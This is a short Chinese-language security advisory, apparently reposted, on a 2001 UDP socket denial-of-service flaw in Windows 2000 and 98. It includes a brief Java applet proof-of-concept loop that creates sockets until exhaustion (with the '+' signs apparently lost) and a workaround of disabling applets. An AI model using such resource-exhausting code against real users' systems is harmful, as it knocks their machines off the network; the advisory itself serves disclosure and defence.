Win2000和98的UDP套接字拒绝服务漏洞

发布日期：2001-02-14
更新日期：2001-02-14

受影响系统：

Microsoft Windows 98
Microsoft Windows NT 2000

描述：

---

BUGTRAQ ID: 2340
CVE(CAN) ID: CAN-2001-0324

Win2000和Win98容易受到拒绝服务的影响。当收到一封恶意构造的电子邮件或者访问某个
恶意的网站时，Win2000可能会停止DNS解析，而Win98则会拒绝接受新的TCP连接。这是由
于用户应用程序在分配网络套接字（socket）时缺少限制所引起的。放置在网站上的恶意
的Java applet可以利用这个漏洞并使受害系统拒绝服务。

<* 来源：Georgi Guninski (guninski@guninski.com) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Georgi Guninski给出如下Java applet演示代码：
for(i=0;i<m;i )
{

try { DatagramSocket d = new DatagramSocket();v.addElement(d);}
catch (Exception e) {System.out.println("Exhausted, i=" i);}
}

可参考其演示页面：http://www.guninski.com/winudpdos.html




建议：

---

临时解决方法：

在浏览器中禁止java applet.

厂商补丁：

暂无

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有